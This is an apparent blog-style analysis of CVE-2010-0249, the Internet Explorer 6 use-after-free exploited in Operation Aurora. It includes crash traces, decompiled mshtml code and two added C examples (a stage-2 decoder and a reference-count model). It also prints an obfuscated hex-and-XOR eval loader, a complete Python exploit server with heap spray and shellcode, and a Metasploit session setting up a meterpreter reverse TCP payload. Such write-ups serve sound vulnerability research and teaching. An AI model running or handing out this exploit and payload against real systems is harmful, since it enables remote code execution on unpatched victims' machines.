CVE-2010-0249
Vulnerability overview
Operation Aurora was a cyber attack in mid-December 2009 that possibly originated in China. The name "Aurora" comes from part of the path of the malicious files on the attackers' machines. Besides Google, more than twenty other companies were hit, including Adobe Systems, Juniper Networks, Rackspace, Yahoo, Symantec, Northrop Grumman and Dow Chemical. After the attack Google announced a new plan: it would run a completely unfiltered search engine in China "within the limits of the law", and acknowledged that if this proved impossible it might leave China and close its offices there (source: Wikipedia). The 0-day used in Operation Aurora was CVE-2010-0249.
The root cause is that when mshtml's EVENTPARAM takes a pointer to an object, it does not increment that object's reference count, which leaves a dangling pointer. Once the object's reference count drops to zero the object is freed, but the pointer held in EVENTPARAM still points at it; a remote attacker who lures a user into visiting a malicious web page can turn this invalid memory access into code execution on the user's system. In other words, this is a UAF (Use After Free).
Test environment
Operating system: Windows XP SP3
IE version: IE6
Vulnerability analysis
I tried many PoCs found online. In other people's write-ups the debugger breaks as soon as the page has loaded, but for me it would not break, and I don't know exactly why. I finally found a PoC that works:
```html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<script>
var IwpVuiFqihVySoJStwXmT ='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';
var RXb = '';
for (i = 0;i<IwpVuiFqihVySoJStwXmT.length;i+=2) {
    RXb += String.fromCharCode(parseInt(IwpVuiFqihVySoJStwXmT.substring(i, i+2), 16));
}
var vuWGWsvUonxrQzpqgBXPrZNSKRGee = location.search.substring(1);
var NqxAXnnXiILOBMwVnKoqnbp = '';
for (i=0;i<RXb.length;i++) {
    NqxAXnnXiILOBMwVnKoqnbp += String.fromCharCode(RXb.charCodeAt(i) ^
        vuWGWsvUonxrQzpqgBXPrZNSKRGee.charCodeAt(i%vuWGWsvUonxrQzpqgBXPrZNSKRGee.length));
}
window["eval".replace(/[A-Z]/g,"")](NqxAXnnXiILOBMwVnKoqnbp);
</script>
</head>
<body>
<span id="vhQYFCtoDnOzUOuxAflDSzVMIHYhjJojAOCHNZtQdlxSPFUeEthCGdRtiIY"><iframe src="/infowTVeeGDYJWNfsrdrvXiYApnuPoCMjRrSZuKtbVgwuZCXwxKjtEclbPuJPPctcflhsttMRrSyxl.gif" onload="WisgEgTNEfaONekEqaMyAUALLMYW(event)" /></span>
</body>
</html>
```
Put the PoC on a locally hosted web server (IIS 6.0 here) and append ?rFfWELUjLJHpP to the URL when visiting it. This is the decryption key; it is presumably auto-generated, and the links Metasploit generates for this module carry such a key.
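As an added example (not part of the original post), the following C program reproduces offline what the loader in the PoC's first script does: hex-decode the constant string, XOR it byte by byte with the key taken from the query string, and hand the result to eval(). Decoding it this way lets an analyst read the second stage without ever running it. The hex blob is constructed here from a harmless placeholder script rather than the real payload.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Hex string -> bytes, mirroring the PoC's parseInt(substring(i, i+2), 16)
 * loop. Returns the byte count, or -1 on odd length / non-hex input. */
static int hex_decode(const char *hex, unsigned char *out, size_t cap) {
    size_t n = strlen(hex);
    if (n % 2 != 0 || n / 2 > cap) return -1;
    for (size_t i = 0; i < n; i += 2) {
        unsigned v;
        if (!isxdigit((unsigned char)hex[i]) || !isxdigit((unsigned char)hex[i + 1])
            || sscanf(hex + i, "%2x", &v) != 1) return -1;
        out[i / 2] = (unsigned char)v;
    }
    return (int)(n / 2);
}

/* Recover the second stage: hex-decode, then XOR byte i with key[i % klen],
 * exactly as the loader does before calling eval(). Returns length or -1. */
int decode_stage2(const char *hex, const char *key, char *out, size_t cap) {
    unsigned char buf[4096];
    size_t klen = strlen(key);
    int n = hex_decode(hex, buf, sizeof buf);
    if (n < 0 || klen == 0 || (size_t)n + 1 > cap) return -1;
    for (int i = 0; i < n; i++)
        out[i] = (char)(buf[i] ^ (unsigned char)key[i % klen]);
    out[n] = '\0';
    return n;
}

/* Inverse of decode_stage2; used only to construct the sample blob below. */
int encode_stage2(const char *plain, const char *key, char *hex, size_t cap) {
    size_t n = strlen(plain), klen = strlen(key);
    if (klen == 0 || 2 * n + 1 > cap) return -1;
    for (size_t i = 0; i < n; i++)
        sprintf(hex + 2 * i, "%02x",
                (unsigned)((unsigned char)plain[i] ^ (unsigned char)key[i % klen]));
    return (int)n;
}

int main(void) {
    const char *key = "rFfWELUjLJHpP";  /* the key from the post's URL */
    char hex[256], plain[128];          /* constructed sample, not the real stage 2 */
    encode_stage2("alert('stage2')", key, hex, sizeof hex);
    decode_stage2(hex, key, plain, sizeof plain);
    printf("hex blob: %s\nstage 2 : %s\n", hex, plain);
    return 0;
}
```

With a captured page, paste the real hex constant and the key from the URL into decode_stage2; a wrong key yields unreadable bytes rather than JavaScript, which is a quick way to confirm the key belongs to that sample.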
Set WinDbg as the just-in-time debugger, then open the URL in IE. It does not always succeed on the first try, so repeat it a few times; when it succeeds WinDbg pops up directly and shows the following.
You can see that an invalid address is being accessed here:
```text
(d24.7fc): Access violation - code c0000005 (!!! second chance !!!)
eax=01c93760 ebx=00000054 ecx=00000054 edx=01cb8fd0 esi=01c919c0 edi=ffffffff
eip=7e278c83 esp=0012e35c ebp=0012e37c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CElement::GetDocPtr:
7e278c83 8b01            mov     eax,dword ptr [ecx]  ds:0023:00000054=????????
0:000> dd ecx
00000054  ???????? ???????? ???????? ????????
00000064  ???????? ???????? ???????? ????????
00000074  ???????? ???????? ???????? ????????
00000084  ???????? ???????? ???????? ????????
00000094  ???????? ???????? ???????? ????????
000000a4  ???????? ???????? ???????? ????????
000000b4  ???????? ???????? ???????? ????????
000000c4  ???????? ???????? ???????? ????????
```
Now look back at where ecx came from. In the stack backtrace the return address of the current function is 0x7e44c4c8; follow it.
```text
0:000> kv
ChildEBP RetAddr  Args to Child
0012e358 7e44c4c8 01c99320 0039bc20 7e4b61ec mshtml!CElement::GetDocPtr (FPO: [0,0,0])
0012e37c 7e44c623 0039bc28 000003e9 0012e3b0 mshtml!CEventObj::GenericGetElement+0x9c (FPO: [Non-Fpo])
0012e38c 7e3af659 01c936f0 0039bc28 0247f010 mshtml!CEventObj::get_srcElement+0x15 (FPO: [Non-Fpo])
0012e3b0 7e2a8a23 01c936f0 0247f010 01c99320 mshtml!GS_IDispatchp+0x33 (FPO: [Non-Fpo])
0012e430 7e2a88bf 01c936f0 000003e9 7e3af626 mshtml!CBase::ContextInvokeEx+0x462 (FPO: [Non-Fpo])
0012e45c 75be1408 01c936f0 000003e9 00000409 mshtml!CBase::InvokeEx+0x25 (FPO: [Non-Fpo])
0012e494 75be1378 0039a4f0 01c993c0 000003e9 jscript!IDispatchExInvokeEx2+0xac (FPO: [Non-Fpo])
0012e4cc 75be6db3 0039a4f0 01c993c0 000003e9 jscript!IDispatchExInvokeEx+0x56 (FPO: [Non-Fpo])
0012e53c 75be10d8 0039a4f0 01c993c0 000003e9 jscript!InvokeDispatchEx+0x78 (FPO: [Non-Fpo])
0012e584 75be680b 0039a4f0 0012e5d4 00000002 jscript!VAR::InvokeByName+0xba (FPO: [Non-Fpo])
```
Working backwards from the bottom of the listing below, eax=[ecx]=[ebx]=[[esi]]=[[[eax]]]=[[[[ebp-8]]]]. The assignment of eax to esi is guarded by a branch; ignore that for now and treat it as plain eax. Note also that the instruction right after the crash site is a call dword ptr [eax+34h], so whoever controls eax controls the program flow, and controlling eax means controlling [ebp-8], which is clearly a controllable location.
```text
0:000> ub 7e44c4c8 l20
mshtml!CEventObj::GenericGetElement+0x43:
7e44c46f 8906            mov     dword ptr [esi],eax
7e44c471 8d45f8          lea     eax,[ebp-8]
7e44c474 50              push    eax
7e44c475 e8ce1de3ff      call    mshtml!CEventObj::GetParam (7e27e248)
7e44c47a 85c0            test    eax,eax
7e44c47c 8945fc          mov     dword ptr [ebp-4],eax
7e44c47f 0f85ae000000    jne     mshtml!CEventObj::GenericGetElement+0x107 (7e44c533)
7e44c485 8b450c          mov     eax,dword ptr [ebp+0Ch]
7e44c488 2de9030000      sub     eax,3E9h
7e44c48d 57              push    edi
7e44c48e 7422            je      mshtml!CEventObj::GenericGetElement+0x86 (7e44c4b2)
7e44c490 83e808          sub     eax,8
7e44c493 7412            je      mshtml!CEventObj::GenericGetElement+0x7b (7e44c4a7)
7e44c495 48              dec     eax
7e44c496 0f8596000000    jne     mshtml!CEventObj::GenericGetElement+0x106 (7e44c532)
7e44c49c 8b45f8          mov     eax,dword ptr [ebp-8]
7e44c49f 8b7008          mov     esi,dword ptr [eax+8]
7e44c4a2 8b787c          mov     edi,dword ptr [eax+7Ch]
7e44c4a5 eb13            jmp     mshtml!CEventObj::GenericGetElement+0x8e (7e44c4ba)
7e44c4a7 8b45f8          mov     eax,dword ptr [ebp-8]
7e44c4aa 8b7004          mov     esi,dword ptr [eax+4]
7e44c4ad 8b7878          mov     edi,dword ptr [eax+78h]
7e44c4b0 eb08            jmp     mshtml!CEventObj::GenericGetElement+0x8e (7e44c4ba)
7e44c4b2 8b45f8          mov     eax,dword ptr [ebp-8]
7e44c4b5 8b30            mov     esi,dword ptr [eax]
7e44c4b7 8b7874          mov     edi,dword ptr [eax+74h]
7e44c4ba 85f6            test    esi,esi
7e44c4bc 7474            je      mshtml!CEventObj::GenericGetElement+0x106 (7e44c532)
7e44c4be 53              push    ebx
7e44c4bf 8b1e            mov     ebx,dword ptr [esi]
7e44c4c1 8bcb            mov     ecx,ebx
7e44c4c3 e8bbc7e2ff      call    mshtml!CElement::GetDocPtr (7e278c83)
mshtml!CElement::GetDocPtr:
7e278c83 8b01            mov     eax,dword ptr [ecx]  ds:0023:00000054=????????
7e278c85 ff5034          call    dword ptr [eax+34h]
```
I ran into a tricky problem while debugging this: none of the breakpoints I set here would trigger, whether a normal breakpoint, a hardware breakpoint, a memory-access breakpoint or a message breakpoint; I have not found the cause yet. Moreover, if the breakpoint is placed at the address where the crash currently happens, it fires before the page has even loaded, and keeps firing endlessly, so execution never gets past it.
Looking at the earlier stack backtrace again, the caller of the crashing function is GenericGetElement. Open mshtml.dll in IDA, load the symbol file, and locate this function.
We saw earlier that the crashing function is CElement::GetDocPtr; here its argument is v5. Tracing backwards, v5 comes from v15, and v15 is declared as struct EVENTPARAM *v15; so v15 is a pointer to a data structure named EVENTPARAM.
```c
int __thiscall CEventObj::GenericGetElement(CEventObj *this, struct IHTMLElement **a2, int a3)
{
  CEventObj *v3; // ecx
  CEventObj *v4; // ecx
  struct CRootElement **v5; // esi
  int v6; // edi
  struct CRootElement *v7; // ebx
  struct CDoc *v8; // eax
  CMapElement *v9; // eax
  int v10; // eax
  CBase *v11; // ecx
  int result; // eax
  struct IUnknown *v13; // [esp+4h] [ebp-10h]
  CEventObj *v14; // [esp+8h] [ebp-Ch]
  struct EVENTPARAM *v15; // [esp+Ch] [ebp-8h]
  int v16; // [esp+10h] [ebp-4h]

  v16 = 0;
  v14 = this;
  if ( !a2 )
  {
    v16 = -2147467261;
    goto LABEL_23;
  }
  v3 = v14;
  *a2 = 0;
  if ( !CEventObj::GetUnknownPtr(v3, a3, &v13) )
    goto LABEL_23;
  v4 = v14;
  *a2 = (struct IHTMLElement *)v13;
  v16 = CEventObj::GetParam(v4, &v15);
  if ( v16 )
    goto LABEL_23;
  switch ( a3 )
  {
    case 1001:
      v5 = *(struct CRootElement ***)v15;
      v6 = *((_DWORD *)v15 + 29);
      break;
    case 1009:
      v5 = (struct CRootElement **)*((_DWORD *)v15 + 1);
      v6 = *((_DWORD *)v15 + 30);
      break;
    case 1010:
      v5 = (struct CRootElement **)*((_DWORD *)v15 + 2);
      v6 = *((_DWORD *)v15 + 31);
      break;
    default:
      goto LABEL_23;
  }
  if ( v5 )
  {
    v7 = *v5;
    v8 = CElement::GetDocPtr(*v5);
    if ( v7 != CMarkup::Root(*(CMarkup **)(*(_DWORD *)(*((_DWORD *)v8 + 83) + 44) + 32)) )
    {
      if ( v6 >= 0 && *((_BYTE *)v5 + 8) == 51 )
      {
        a3 = 0;
        v9 = (CMapElement *)*((_DWORD *)*v5 + 9);
        if ( v9 )
        {
          CMapElement::GetAreaContaining(v9, v6, (struct CAreaElement **)&a3);
          if ( a3 )
            v5 = *(struct CRootElement ***)(a3 + 16);
        }
      }
      if ( v5 )
      {
        if ( v5 == *((struct CRootElement ***)*v5 + 4) )
          v10 = (*(int (__cdecl **)(struct CRootElement *, GUID *, struct IHTMLElement **))(*(_DWORD *)*v5 + 128))(
                  *v5,
                  &IID_IHTMLElement,
                  a2);
        else
          v10 = CTreeNode::GetInterface((CTreeNode *)v5, &IID_IHTMLElement, (void **)a2);
        v16 = v10;
      }
    }
  }
LABEL_23:
  v11 = (CBase *)*((_DWORD *)v14 + 4);
  if ( v11 )
    result = CBase::SetErrorInfo(v11, v16);
  else
    result = v16;
  return result;
}
```
The definition of this structure was found by consulting references. The first field of EVENTPARAM is _pNode:
```c
struct EVENTPARAM
    +0x00 _pNode      // src element
    +0x04 _pNodeFrom  // for move, over, out
    +0x08 _pNodeTo    // for move, over, out
```
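The following is an added example, not code from the post or from mshtml: a simplified C model of the defect the decompilation above exposes. TreeNode and EventParam are stand-ins for CTreeNode and EVENTPARAM that only mimic reference counting; the vulnerable path stores _pNode without taking a reference, the fixed path takes one, and the later srcElement read shows which of the two ends up dereferencing a freed node.

```c
#include <stdlib.h>
/* Stand-in for mshtml's CTreeNode: reference counted. On the last Release the
 * node is only marked freed (not handed back to the allocator) so a dangling
 * dereference can be reported instead of being undefined behaviour. */
typedef struct TreeNode { int refs; int freed; int id; } TreeNode;

/* Stand-in for EVENTPARAM; only +0x00 _pNode (the src element) is modelled. */
typedef struct EventParam { TreeNode *pNode; } EventParam;

static TreeNode *node_create(int id) {
    TreeNode *n = calloc(1, sizeof *n);
    if (!n) abort();
    n->refs = 1;                 /* the DOM tree holds the first reference */
    n->id = id;
    return n;
}
static void node_addref(TreeNode *n) { n->refs++; }
static void node_release(TreeNode *n) { if (--n->refs == 0) n->freed = 1; }

/* createEventObject(evt): copy the src element pointer into a new EVENTPARAM.
 * The vulnerable code stored the raw pointer; with fixed != 0 the event object
 * takes its own reference, so the node cannot die while it is still held. */
static void eventparam_init(EventParam *p, TreeNode *src, int fixed) {
    p->pNode = src;
    if (fixed) node_addref(src);
}
static void eventparam_destroy(EventParam *p, int fixed) {
    if (fixed) node_release(p->pNode);
    p->pNode = NULL;
}

/* event.srcElement -> GenericGetElement case 1001 -> GetDocPtr(*_pNode).
 * Returns the element id, or -1 when _pNode is dangling (the crash site). */
static int eventparam_src_element(const EventParam *p) {
    if (!p->pNode || p->pNode->freed) return -1;
    return p->pNode->id;
}

/* Replays the exploit's sequence: <img onload> fires, ev1 keeps the event
 * object, innerHTML = "" drops the DOM's reference, ev2 reads srcElement.
 * Returns 42 when the element survived, -1 when the read hit a freed node. */
int simulate(int fixed) {
    TreeNode *img = node_create(42);
    EventParam ev;
    eventparam_init(&ev, img, fixed);
    node_release(img);                    /* innerHTML = "" */
    int r = eventparam_src_element(&ev);  /* ev2(): event_obj.srcElement */
    eventparam_destroy(&ev, fixed);
    free(img);
    return r;
}
```

In the real browser the freed slot is what the exploit's heap spray refills with 0x0a0a0a0a, which is why the crash above shows ecx pointing into garbage rather than at a CTreeNode.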
I then switched to a different exploit. Running it pops the calculator directly, but setting breakpoints is still a problem: exactly as above, they never trigger. I asked the author under one of the articles and have not received a reply yet; I will add to this later.
The exploit is a Python 2 script. Run it from cmd as xxx.py 8080 and it serves the page on that port.
Exploit
```python
#
# Author : Ahmed Obied (ahmed.obied@gmail.com)
#
# This program acts as a web server that generates an exploit to
# target a vulnerability (CVE-2010-0249) in Internet Explorer.
# The exploit was tested using Internet Explorer 6 on Windows XP SP2.
# The exploit's payload spawns the calculator.
#
# Usage : python ie_aurora.py [port number]
#

import sys
import socket
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler


class RequestHandler(BaseHTTPRequestHandler):

    def convert_to_utf16(self, payload):
        enc_payload = ''
        for i in range(0, len(payload), 2):
            num = 0
            for j in range(0, 2):
                num += (ord(payload[i + j]) & 0xff) << (j * 8)
            enc_payload += '%%u%04x' % num
        return enc_payload

    def get_payload(self):
        # win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub
        # http://metasploit.com
        payload = '\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73'
        payload += '\x13\x6f\x02\xb1\x0e\x83\xeb\xfc\xe2\xf4\x93\xea\xf5\x0e'
        payload += '\x6f\x02\x3a\x4b\x53\x89\xcd\x0b\x17\x03\x5e\x85\x20\x1a'
        payload += '\x3a\x51\x4f\x03\x5a\x47\xe4\x36\x3a\x0f\x81\x33\x71\x97'
        payload += '\xc3\x86\x71\x7a\x68\xc3\x7b\x03\x6e\xc0\x5a\xfa\x54\x56'
        payload += '\x95\x0a\x1a\xe7\x3a\x51\x4b\x03\x5a\x68\xe4\x0e\xfa\x85'
        payload += '\x30\x1e\xb0\xe5\xe4\x1e\x3a\x0f\x84\x8b\xed\x2a\x6b\xc1'
        payload += '\x80\xce\x0b\x89\xf1\x3e\xea\xc2\xc9\x02\xe4\x42\xbd\x85'
        payload += '\x1f\x1e\x1c\x85\x07\x0a\x5a\x07\xe4\x82\x01\x0e\x6f\x02'
        payload += '\x3a\x66\x53\x5d\x80\xf8\x0f\x54\x38\xf6\xec\xc2\xca\x5e'
        payload += '\x07\x7c\x69\xec\x1c\x6a\x29\xf0\xe5\x0c\xe6\xf1\x88\x61'
        payload += '\xd0\x62\x0c\x2c\xd4\x76\x0a\x02\xb1\x0e'
        return self.convert_to_utf16(payload)

    def get_exploit(self):
        exploit = '''
        <html>
        <head>
        <script>
        var obj, event_obj;

        function spray_heap()
        {
            var chunk_size, payload, nopsled;
            chunk_size = 0x80000;
            payload = unescape("<PAYLOAD>");
            nopsled = unescape("<NOP>");
            while (nopsled.length < chunk_size)
                nopsled += nopsled;
            nopsled_len = chunk_size - (payload.length + 20);
            nopsled = nopsled.substring(0, nopsled_len);
            heap_chunks = new Array();
            for (var i = 0 ; i < 200 ; i++)
                heap_chunks[i] = nopsled + payload;
        }

        function initialize()
        {
            obj = new Array();
            event_obj = null;
            for (var i = 0; i < 200 ; i++ )
                obj[i] = document.createElement("COMMENT");
        }

        function ev1(evt)
        {
            event_obj = document.createEventObject(evt);
            document.getElementById("sp1").innerHTML = "";
            window.setInterval(ev2, 1);
        }

        function ev2()
        {
            var data, tmp;
            data = "";
            tmp = unescape("%u0a0a%u0a0a");
            for (var i = 0 ; i < 4 ; i++)
                data += tmp;
            for (i = 0 ; i < obj.length ; i++ ) {
                obj[i].data = data;
            }
            event_obj.srcElement;
        }

        function check()
        {
            if (navigator.userAgent.indexOf("MSIE") == -1)
                return false;
            return true;
        }

        if (check()) {
            initialize();
            spray_heap();
        }
        else
            window.location = 'about:blank'
        </script>
        </head>
        <body>
        <span id="sp1">
            <img src="aurora.gif" onload="ev1(event)">
        </span>
        </body>
        </html>
        '''
        exploit = exploit.replace('<PAYLOAD>', self.get_payload())
        exploit = exploit.replace('<NOP>', '%u0a0a%u0a0a')
        return exploit

    def get_image(self):
        content = '\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff'
        content += '\x00\x00\x00\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44'
        content += '\x01\x00\x3b'
        return content

    def log_request(self, *args, **kwargs):
        pass

    def do_GET(self):
        try:
            if self.path == '/':
                print
                print '[-] Incoming connection from %s' % self.client_address[0]
                self.send_response(200)
                self.send_header('Content-Type', 'text/html')
                self.end_headers()
                print '[-] Sending exploit to %s ...' % self.client_address[0]
                self.wfile.write(self.get_exploit())
                print '[-] Exploit sent to %s' % self.client_address[0]
            elif self.path == '/aurora.gif':
                self.send_response(200)
                self.send_header('Content-Type', 'image/gif')
                self.end_headers()
                self.wfile.write(self.get_image())
        except:
            print '[*] Error : an error has occured while serving the HTTP request'
            print '[-] Exiting ...'
            sys.exit(-1)


def main():
    if len(sys.argv) != 2:
        print 'Usage: %s [port number (between 1024 and 65535)]' % sys.argv[0]
        sys.exit(0)
    try:
        port = int(sys.argv[1])
        if port < 1024 or port > 65535:
            raise ValueError
        try:
            serv = HTTPServer(('', port), RequestHandler)
            ip = socket.gethostbyname(socket.gethostname())
            print '[-] Web server is running at http://%s:%d/' % (ip, port)
            try:
                serv.serve_forever()
            except:
                print '[-] Exiting ...'
        except socket.error:
            print '[*] Error : a socket error has occurred'
            sys.exit(-1)
    except ValueError:
        print '[*] Error : an invalid port number was given'
        sys.exit(-1)


if __name__ == '__main__':
    main()
```
Patch
MS10-002
https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2010/ms10-002#%E6%9C%AA%E5%88%9D%E5%A7%8B%E5%8C%96%E7%9A%84%E5%86%85%E5%AD%98%E6%8D%9F%E5%9D%8F%E6%BC%8F%E6%B4%9E---cve-2010-0249
Penetration test
Frustratingly, the exploitation attempt with Metasploit failed, and I do not yet know why; the versions should not be the problem.
```text
[-] ***
[-] * WARNING: No database support: No database YAML file
[-] ***
                 _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
               `.@@@@    @@   .
                 ',@@     @   ;           _____________
                  (   3 C    )     /|___ / Metasploit! \
                  ;@'. __*__,."    \|--- \_____________/
                   '(.,...."/

       =[ metasploit v5.0.12-dev-b021cbafa9e58f48b8e940ad2ebc4e4d38b9ec09]
+ -- --=[ 1866 exploits - 1058 auxiliary - 327 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 > use windows/browser/ms10_002_aurora
msf5 exploit(windows/browser/ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/browser/ms10_002_aurora) > show options

Module options (exploit/windows/browser/ms10_002_aurora):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(windows/browser/ms10_002_aurora) > set LHOST 10.100.247.120
LHOST => 10.100.247.120
msf5 exploit(windows/browser/ms10_002_aurora) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/browser/ms10_002_aurora) >
[*] Started reverse TCP handler on 10.100.247.120:4444
[*] Using URL: http://0.0.0.0:8080/GkVmbLpBSZCShr
[*] Local IP: http://10.100.247.120:8080/GkVmbLpBSZCShr
[*] Server started.
[*] 10.100.247.120   ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
session -i
[-] Unknown command: session.
msf5 exploit(windows/browser/ms10_002_aurora) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/browser/ms10_002_aurora) >
[-] Handler failed to bind to 10.100.247.120:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Using URL: http://0.0.0.0:8080/wAdPlPmXUe0BNhd
[*] Local IP: http://10.100.247.120:8080/wAdPlPmXUe0BNhd
[*] Server started.
[*] 10.100.247.120   ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
sessions -l

Active sessions
===============

No active sessions.
```